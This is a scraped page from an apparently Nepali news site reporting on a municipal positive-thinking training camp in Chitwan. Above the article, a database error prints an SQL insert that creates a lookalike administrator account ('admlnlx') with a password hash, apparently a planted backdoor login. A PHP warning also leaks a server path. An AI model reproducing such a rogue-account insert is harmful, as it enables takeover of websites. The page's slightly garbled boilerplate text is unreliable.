WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BiUF0tHCWdNVVDVYplGOWpabDWmKnV0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 12:13:59', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
सकरात्मक सोँच अभिवृद्धि तालिम सुरु – Gaule Khabar

सकरात्मक सोँच अभिवृद्धि तालिम सुरु

सकरात्मक सोँच अभिवृद्धि तालिम सुरु

चितवन, पुस ६–

माडी नगरपालिकाको आयोजनामा सकारात्मक सोंच अभिवृद्धि एवम् विकास ध्यान प्रशिक्षण शिविर जगतपुरमा सुरु भएको छ ।
स्थानीय विकास अधिकारी श्रवणकुमार पोखरेलको प्रमुख आतिथ्यतामा संचालित कार्यक्रम माडी नगरपालिकाका कार्यकारी अधिकृत रामप्रसाद सापकोटाको अध्यक्षतामा संचालन भएको थियो । ३ दिने शिविरमा ५३ जनाको सहभागिता छ । महिला नेतृ सविता बराल, दिपेन्द्र पौडेल, दिपेन्द्र पाठक लगायतले बोल्नुभएको थियो । कार्यक्रममा प्रशिक्षक यादव हुमागाईले प्रशिक्षण दिनुभएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका